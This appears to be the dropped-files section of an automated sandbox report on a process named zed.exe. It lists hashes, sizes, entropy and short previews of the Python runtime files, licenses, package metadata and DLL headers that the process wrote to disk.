                                                                                                                                                                                                                                            SHA1:42FD5CFA75566E8A9525E087A2018E8666ED22CB
                                                                                                                                                                                                                                            SHA-256:F3FE049EB2EF6E1CC7DB6E181FC5B2A6807B1C59FEBE96F0AFFCC796BDD75012
                                                                                                                                                                                                                                            SHA-512:B29FEAF6587601BBE0EDAD3DF9A87BFC82BB2C13E91103699BABD7E039F05558C0AC1EF7D904BCFAF85D791B96BC26FA9E39988DD83A1CE8ECCA85029C5109F0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Wheel-Version: 1.0.Generator: maturin (1.7.0).Root-Is-Purelib: false.Tag: cp39-abi3-win_amd64.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):197
                                                                                                                                                                                                                                            Entropy (8bit):4.61968998873571
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:hWDncJhByZmJgXPForADu1QjygQuaAJygT2d5GeWreLRuOFEXAYeBKmJozlMHuO:h9Co8FyQjkDYc5tWreLBF/pn2mH1
                                                                                                                                                                                                                                            MD5:8C3617DB4FB6FAE01F1D253AB91511E4
                                                                                                                                                                                                                                            SHA1:E442040C26CD76D1B946822CAF29011A51F75D6D
                                                                                                                                                                                                                                            SHA-256:3E0C7C091A948B82533BA98FD7CBB40432D6F1A9ACBF85F5922D2F99A93AE6BB
                                                                                                                                                                                                                                            SHA-512:77A1919E380730BCCE5B55D76FBFFBA2F95874254FAD955BD2FE1DE7FC0E4E25B5FDAAB0FEFFD6F230FA5DC895F593CF8BFEDF8FDC113EFBD8E22FADAB0B8998
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:This software is made available under the terms of *either* of the licenses.found in LICENSE.APACHE or LICENSE.BSD. Contributions to cryptography are made.under the terms of *both* these licenses..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):11360
                                                                                                                                                                                                                                            Entropy (8bit):4.426756947907149
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:nUDG5KXSD9VYUKhu1JVF9hFGvV/QiGkS594drFjuHYx5dvTrLh3kTSEnQHbHR:UIvlKM1zJlFvmNz5VrlkTS0QHt
                                                                                                                                                                                                                                            MD5:4E168CCE331E5C827D4C2B68A6200E1B
                                                                                                                                                                                                                                            SHA1:DE33EAD2BEE64352544CE0AA9E410C0C44FDF7D9
                                                                                                                                                                                                                                            SHA-256:AAC73B3148F6D1D7111DBCA32099F68D26C644C6813AE1E4F05F6579AA2663FE
                                                                                                                                                                                                                                            SHA-512:F451048E81A49FBFA11B49DE16FF46C52A8E3042D1BCC3A50AAF7712B097BED9AE9AED9149C21476C2A1E12F1583D4810A6D36569E993FE1AD3879942E5B0D52
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:. Apache License. Version 2.0, January 2004. https://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) beneficial ow
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1532
                                                                                                                                                                                                                                            Entropy (8bit):5.058591167088024
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:MjUnoorbOFFTJJyRrYFTjzMbmqEvBTP4m96432s4EOkUTKQROJ32s3yxsITf+3tY:MkOFJSrYJsaN5P406432svv32s3EsIqm
                                                                                                                                                                                                                                            MD5:5AE30BA4123BC4F2FA49AA0B0DCE887B
                                                                                                                                                                                                                                            SHA1:EA5B412C09F3B29BA1D81A61B878C5C16FFE69D8
                                                                                                                                                                                                                                            SHA-256:602C4C7482DE6479DD2E9793CDA275E5E63D773DACD1ECA689232AB7008FB4FB
                                                                                                                                                                                                                                            SHA-512:DDBB20C80ADBC8F4118C10D3E116A5CD6536F72077C5916D87258E155BE561B89EB45C6341A1E856EC308B49A4CB4DBA1408EABD6A781FBE18D6C71C32B72C41
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Copyright (c) Individual contributors..All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions are met:.. 1. Redistributions of source code must retain the above copyright notice,. this list of conditions and the following disclaimer... 2. Redistributions in binary form must reproduce the above copyright. notice, this list of conditions and the following disclaimer in the. documentation and/or other materials provided with the distribution... 3. Neither the name of PyCA Cryptography nor the names of its contributors. may be used to endorse or promote products derived from this software. without specific prior written permission...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND.ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED.WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOS
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7900672
                                                                                                                                                                                                                                            Entropy (8bit):6.519460416205842
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:49152:Hvisa2OcIo0UYN1YA2sBCT7I0XIU6iOGtlqNVwASO0AIjoI+b0vjemXSKSDhxlT3:Pi/2PTYDBCT7NY+gTNxY7GbdJ295x
                                                                                                                                                                                                                                            MD5:81AD4F91BB10900E3E2E8EAF917F42C9
                                                                                                                                                                                                                                            SHA1:840F7AEF02CDA6672F0E3FC7A8D57F213DDD1DC6
                                                                                                                                                                                                                                            SHA-256:5F20D6CEC04685075781996A9F54A78DC44AB8E39EB5A2BCF3234E36BEF4B190
                                                                                                                                                                                                                                            SHA-512:11CD299D6812CDF6F0A74BA86EB44E9904CE4106167EBD6E0B81F60A5FCD04236CEF5CFF81E51ED391F5156430663056393DC07353C4A70A88024194768FFE9D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......l..(...(...(...!...:...8...*...8...,...8... ...8...9...c..&...G...*...(...+...`...V...(.....`...)...`...)...Rich(...........................PE..d....j.f.........." ...).`Z..V........X.......................................x...........`.........................................p.r.......r...............t...............x......Cj.T....................Cj.(....Aj.@............pZ..............................text...._Z......`Z................. ..`.rdata..ZR...pZ..T...dZ.............@..@.data....+....r.......r.............@....pdata........t.......s.............@..@.reloc........x.......w.............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):5191960
                                                                                                                                                                                                                                            Entropy (8bit):5.962142634441191
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:98304:n3+pefu6fSar+SJ8aqfPomg1CPwDvt3uFlDCE:3G+u6fb+SJ8aqfwmg1CPwDvt3uFlDCE
                                                                                                                                                                                                                                            MD5:E547CF6D296A88F5B1C352C116DF7C0C
                                                                                                                                                                                                                                            SHA1:CAFA14E0367F7C13AD140FD556F10F320A039783
                                                                                                                                                                                                                                            SHA-256:05FE080EAB7FC535C51E10C1BD76A2F3E6217F9C91A25034774588881C3F99DE
                                                                                                                                                                                                                                            SHA-512:9F42EDF04C7AF350A00FA4FDF92B8E2E6F47AB9D2D41491985B20CD0ADDE4F694253399F6A88F4BDD765C4F49792F25FB01E84EC03FD5D0BE8BB61773D77D74D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............l..l..l......l...m..l...i..l...h..l...o..l..m.y.l...m...l...o..l...h.l...l..l......l...n..l.Rich.l.........PE..d......e.........." ...%..7..4......v.........................................O.......P...`.........................................P.H.0....kN.@.....N.|.....K.d.....O../....N....P.C.8.............................C.@............`N..............................text.....7.......7................. ..`.rdata....... 7.......7.............@..@.data....n....K..<....J.............@....pdata..0.....K......4K.............@..@.idata...%...`N..&....N.............@..@.00cfg..u.....N.......N.............@..@.rsrc...|.....N......0N.............@..@.reloc........N......8N.............@..B................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):39696
                                                                                                                                                                                                                                            Entropy (8bit):6.641880464695502
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:NiQfxQemQJNrPN+moyijAc5YiSyvkIPxWEqG:dfxIQvPkmoyijP7SytPxF
                                                                                                                                                                                                                                            MD5:0F8E4992CA92BAAF54CC0B43AACCCE21
                                                                                                                                                                                                                                            SHA1:C7300975DF267B1D6ADCBAC0AC93FD7B1AB49BD2
                                                                                                                                                                                                                                            SHA-256:EFF52743773EB550FCC6CE3EFC37C85724502233B6B002A35496D828BD7B280A
                                                                                                                                                                                                                                            SHA-512:6E1B223462DC124279BFCA74FD2C66FE18B368FFBCA540C84E82E0F5BCBEA0E10CC243975574FA95ACE437B9D8B03A446ED5EE0C9B1B094147CEFAF704DFE978
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".H...(.......L...............................................n....`......................................... l.......p..P...............P....l.../......,...@d...............................c..@............`.. ............................text....G.......H.................. ..`.rdata..h....`.......L..............@..@.data................b..............@....pdata..P............d..............@..@.reloc..,............j..............@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):787224
                                                                                                                                                                                                                                            Entropy (8bit):5.609561366841894
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12288:ytPc2nnGoNg4kSHoxX09yO5EavUFe9Xb12:y9jnnpTHoxXUsFe9XbM
                                                                                                                                                                                                                                            MD5:19A2ABA25456181D5FB572D88AC0E73E
                                                                                                                                                                                                                                            SHA1:656CA8CDFC9C3A6379536E2027E93408851483DB
                                                                                                                                                                                                                                            SHA-256:2E9FBCD8F7FDC13A5179533239811456554F2B3AA2FB10E1B17BE0DF81C79006
                                                                                                                                                                                                                                            SHA-512:DF17DC8A882363A6C5A1B78BA3CF448437D1118CCC4A6275CC7681551B13C1A4E0F94E30FFB94C3530B688B62BFF1C03E57C2C185A7DF2BF3E5737A06E114337
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........>:V.PiV.PiV.Pi_..iX.PiC.QhT.Pi..QhT.PiC.UhZ.PiC.Th^.PiC.ShR.PillQhU.PiV.QiH.PillThf.PillPhW.Pill.iW.PillRhW.PiRichV.Pi................PE..d......e.........." ...%.*..........K........................................ ............`..........................................g...Q..............s.......@M......./......`.......8...........................`...@............p...............................text...D).......*.................. ..`.rdata..Hy...@...z..................@..@.data....N.......H..................@....pdata...V.......X..................@..@.idata...c...p...d...H..............@..@.00cfg..u...........................@..@.rsrc...s...........................@..@.reloc..4...........................@..B........................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):202008
                                                                                                                                                                                                                                            Entropy (8bit):6.367263484296302
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6144:4nwukKYdeMwj1XQk67ZLXni8Es7sp0HhiviBvDKax:KrqiviMax
                                                                                                                                                                                                                                            MD5:815F1BDABB79C6A12B38D84AA343196D
                                                                                                                                                                                                                                            SHA1:916483149875A5E20C6046CEFFEF62DD6089DDD5
                                                                                                                                                                                                                                            SHA-256:31712AE276E2CED05ECDA3E1C08FBBCC2CFF8474A972626ABA55F7797F0ED8C9
                                                                                                                                                                                                                                            SHA-512:1078E7E48B6F6ED160AE2BCCF80A43A5F1CCA769B8A690326E112BF20D7F3D018F855F6AA3B56D315DC0853472E0AFFCFE8E910B5CE69CE952983CFAA496C21D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!...@..@..@..8N..@.:...@.:...@.:...@.:...@.....@..8..@..@..@.....@.....@..."..@.....@.Rich.@.........PE..d.....f.........." ...(..................................................... ......?.....`............................................P...@............................/..........`4..T........................... 3..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...p ..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):68376
                                                                                                                                                                                                                                            Entropy (8bit):6.148788033723542
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:BV1EbYGVXq6KC/prVHBN0cW18itCQDFPnOMFn+gikF/nFX14uewjBcCCC0yamM/D:BDmF61JFn+/O/BI1L057Sy+xF
                                                                                                                                                                                                                                            MD5:8DBE9BBF7118F4862E02CD2AAF43F1AB
                                                                                                                                                                                                                                            SHA1:935BC8C5CEA4502D0FACF0C49C5F2B9C138608ED
                                                                                                                                                                                                                                            SHA-256:29F173E0147390A99F541BA0C0231FDD7DFBCA84D0E2E561EF352BF1EC72F5DB
                                                                                                                                                                                                                                            SHA-512:938F8387DCC356012AC4A952D371664700B110F7111FCC24F5DF7D79791AE95BAD0DBAF77D2D6C86C820BFD48A6BDBE8858B7E7AE1A77DF88E596556C7135ED4
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........5...Te..Te..Te...m..Te...e..Te.....Te...g..Te.Rich.Te.................PE..d......f.........." ...(..................................................................`.........................................`...H................................/..............T............................................................................rdata..............................@..@.rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):6927640
                                                                                                                                                                                                                                            Entropy (8bit):5.765554952149868
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:49152:Jc7/HNCHh0IWiUDFsx3hghs7g6kIPuch+Xe16/02yWYqiVx7qb4f4wmC36nhIVcF:JcBZhxsje2kUvid5E+vbHDMiEr/l9o
                                                                                                                                                                                                                                            MD5:CAE8FA4E7CB32DA83ACF655C2C39D9E1
                                                                                                                                                                                                                                            SHA1:7A0055588A2D232BE8C56791642CB0F5ABBC71F8
                                                                                                                                                                                                                                            SHA-256:8AD53C67C2B4DB4387D5F72EE2A3CA80C40AF444B22BF41A6CFDA2225A27BB93
                                                                                                                                                                                                                                            SHA-512:DB2190DA2C35BCEED0EF91D7553FF0DEA442286490145C3D0E89DB59BA1299B0851E601CC324B5F7FD026414FC73755E8EFF2EF5FB5EEB1C54A9E13E7C66DD0C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D..Z%..Z%..Z%......X%....e.T%......^%......R%......W%..S]..@%...]..Q%..Z%..*$..O....%..O...[%..O.g.[%..O...[%..RichZ%..........PE..d......f.........." ...(..(..6B...............................................j......dj...`.........................................pdN.d....1O.......i......._.`I....i../... i..[..0.2.T.....................H.(....2.@............ (..............................text.....(.......(................. ..`.rdata..f7'.. (..8'...(.............@..@.data....J...`O......HO.............@....pdata..`I...._..J....^.............@..@PyRuntim0.....b.......a.............@....rsrc.........i...... h.............@..@.reloc...[... i..\...*h.............@..B........................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):31000
                                                                                                                                                                                                                                            Entropy (8bit):6.553885009751671
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:I8RVBC9t6Lhz64SHfZslDT90YBI1QGjHQIYiSy1pCQQRaAM+o/8E9VF0NytuSS:1GyqHfK1HBI1QGT5YiSyvXAMxkEm
                                                                                                                                                                                                                                            MD5:79CE1AE3A23DFF6ED5FC66E6416600CD
                                                                                                                                                                                                                                            SHA1:6204374D99144B0A26FD1D61940FF4F0D17C2212
                                                                                                                                                                                                                                            SHA-256:678E09AD44BE42FA9BC9C7A18C25DBE995A59B6C36A13EECC09C0F02A647B6F0
                                                                                                                                                                                                                                            SHA-512:A4E48696788798A7D061C0EF620D40187850741C2BEC357DB0E37A2DD94D3A50F9F55BA75DC4D95E50946CBAB78B84BA1FC42D51FD498640A231321566613DAA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........t..'..'..'..g'..'-..&..'-..&..'-..&..'-..&..'...&..'..'...'...&..'...&..'...&..'...'..'...&..'Rich..'................PE..d.....f.........." ...(.....2......................................................._....`..........................................@..L...<A..x....p.......`.......J.../......L....3..T............................2..@............0...............................text............................... ..`.rdata.......0......................@..@.data...`....P.......8..............@....pdata.......`.......:..............@..@.rsrc........p.......>..............@..@.reloc..L............H..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                                                                            Entropy (8bit):1.5
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Mn:M
                                                                                                                                                                                                                                            MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                            SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                            SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                            SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:pip.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):11358
                                                                                                                                                                                                                                            Entropy (8bit):4.4267168336581415
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:nU6G5KXSD9VYUKhu1JVF9hFGvV/QiGkS594drFjuHYx5dvTrLh3kTSEn7HbHR:U9vlKM1zJlFvmNz5VrlkTS07Ht
                                                                                                                                                                                                                                            MD5:3B83EF96387F14655FC854DDC3C6BD57
                                                                                                                                                                                                                                            SHA1:2B8B815229AA8A61E483FB4BA0588B8B6C491890
                                                                                                                                                                                                                                            SHA-256:CFC7749B96F63BD31C3C42B5C471BF756814053E847C10F3EB003417BC523D30
                                                                                                                                                                                                                                            SHA-512:98F6B79B778F7B0A15415BD750C3A8A097D650511CB4EC8115188E115C47053FE700F578895C097051C9BC3DFB6197C2B13A15DE203273E1A3218884F86E90E8
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:. Apache License. Version 2.0, January 2004. http://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) beneficial own
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4648
                                                                                                                                                                                                                                            Entropy (8bit):5.006900644756252
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:Dx2ZSaCSmS8R902Vpnu386eLQ9Ac+fFZpDN00x2jZ2SBXZJSwTE:9Smzf02Vpnu386mQ9B+TP0vJHJSwTE
                                                                                                                                                                                                                                            MD5:98ABEAACC0E0E4FC385DFF67B607071A
                                                                                                                                                                                                                                            SHA1:E8C830D8B0942300C7C87B3B8FD15EA1396E07BD
                                                                                                                                                                                                                                            SHA-256:6A7B90EFFEE1E09D5B484CDF7232016A43E2D9CC9543BCBB8E494B1EC05E1F59
                                                                                                                                                                                                                                            SHA-512:F1D59046FFA5B0083A5259CEB03219CCDB8CC6AAC6247250CBD83E70F080784391FCC303F7630E1AD40E5CCF5041A57CB9B68ADEFEC1EBC6C31FCF7FFC65E9B7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Metadata-Version: 2.1.Name: importlib_metadata.Version: 8.0.0.Summary: Read metadata from Python packages.Author-email: "Jason R. Coombs" <jaraco@jaraco.com>.Project-URL: Source, https://github.com/python/importlib_metadata.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: Apache Software License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.License-File: LICENSE.Requires-Dist: zipp >=0.5.Requires-Dist: typing-extensions >=3.6.4 ; python_version < "3.8".Provides-Extra: doc.Requires-Dist: sphinx >=3.5 ; extra == 'doc'.Requires-Dist: jaraco.packaging >=9.3 ; extra == 'doc'.Requires-Dist: rst.linker >=1.9 ; extra == 'doc'.Requires-Dist: furo ; extra == 'doc'.Requires-Dist: sphinx-lint ; extra == 'doc'.Requires-Dist: jaraco.tidelift >=1.4 ; extra == 'doc'.Provides-Extra: perf.Requires-D
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2518
                                                                                                                                                                                                                                            Entropy (8bit):5.6307766747793275
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:UnuXTg06U5J/Vw9l/gfNX7/XzBk9pvJq/fwJOfYrBfnJ/V0XJnzN/3WJV:bXzP/EgdzzBkDJsoIYrBfJ/CXNz9qV
                                                                                                                                                                                                                                            MD5:EB513CAFA5226DDA7D54AFDCC9AD8A74
                                                                                                                                                                                                                                            SHA1:B394C7AEC158350BAF676AE3197BEF4D7158B31C
                                                                                                                                                                                                                                            SHA-256:0D8D3C6EEB9EBBE86CAC7D60861552433C329DA9EA51248B61D02BE2E5E64030
                                                                                                                                                                                                                                            SHA-512:A0017CFAFF47FDA6067E3C31775FACEE4728C3220C2D4BD70DEF328BD20AA71A343E39DA15CD6B406F62311894C518DFCF5C8A4AE6F853946F26A4B4E767924E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:importlib_metadata-8.0.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..importlib_metadata-8.0.0.dist-info/LICENSE,sha256=z8d0m5b2O9McPEK1xHG_dWgUBT6EfBDz6wA0F7xSPTA,11358..importlib_metadata-8.0.0.dist-info/METADATA,sha256=anuQ7_7h4J1bSEzfcjIBakPi2cyVQ7y7jklLHsBeH1k,4648..importlib_metadata-8.0.0.dist-info/RECORD,,..importlib_metadata-8.0.0.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..importlib_metadata-8.0.0.dist-info/WHEEL,sha256=mguMlWGMX-VHnMpKOjjQidIo1ssRlCFu4a4mBpz1s2M,91..importlib_metadata-8.0.0.dist-info/top_level.txt,sha256=CO3fD9yylANiXkrMo4qHLV_mqXL2sC5JFKgt1yWAT-A,19..importlib_metadata/__init__.py,sha256=tZNB-23h8Bixi9uCrQqj9Yf0aeC--Josdy3IZRIQeB0,33798..importlib_metadata/__pycache__/__init__.cpython-312.pyc,,..importlib_metadata/__pycache__/_adapters.cpython-312.pyc,,..importlib_metadata/__pycache__/_collections.cpython-312.pyc,,..importlib_metadata/__pycache__/_compat.cpython-312.pyc,,..importlib_metadata/__pycac
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):91
                                                                                                                                                                                                                                            Entropy (8bit):4.687870576189661
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:RtEeXMRYFAVLMvhRRP+tPCCfA5S:RtC1VLMvhjWBBf
                                                                                                                                                                                                                                            MD5:7D09837492494019EA51F4E97823D79F
                                                                                                                                                                                                                                            SHA1:7829B4324BB542799494131A270EC3BDAD4DEDEF
                                                                                                                                                                                                                                            SHA-256:9A0B8C95618C5FE5479CCA4A3A38D089D228D6CB1194216EE1AE26069CF5B363
                                                                                                                                                                                                                                            SHA-512:A0063220ECDD22C3E735ACFF6DE559ACF3AC4C37B81D37633975A22A28B026F1935CD1957C0FF7D2ECC8B7F83F250310795EECC5273B893FFAB115098F7B9C38
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Wheel-Version: 1.0.Generator: setuptools (70.1.1).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):19
                                                                                                                                                                                                                                            Entropy (8bit):3.536886723742169
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:JSej0EBERG:50o4G
                                                                                                                                                                                                                                            MD5:A24465F7850BA59507BF86D89165525C
                                                                                                                                                                                                                                            SHA1:4E61F9264DE74783B5924249BCFE1B06F178B9AD
                                                                                                                                                                                                                                            SHA-256:08EDDF0FDCB29403625E4ACCA38A872D5FE6A972F6B02E4914A82DD725804FE0
                                                                                                                                                                                                                                            SHA-512:ECF1F6B777970F5257BDDD353305447083008CEBD8E5A27C3D1DA9C7BDC3F9BF3ABD6881265906D6D5E11992653185C04A522F4DB5655FF75EEDB766F93D5D48
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:importlib_metadata.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (888)
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1335
                                                                                                                                                                                                                                            Entropy (8bit):4.226823573023539
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:FP6Hbz+g9RPZ14bJi04L6GEbX4UQF4UkZQhxI2EIhNyu:9E+i6bJmLm43+Uxxnh0u
                                                                                                                                                                                                                                            MD5:4CE7501F6608F6CE4011D627979E1AE4
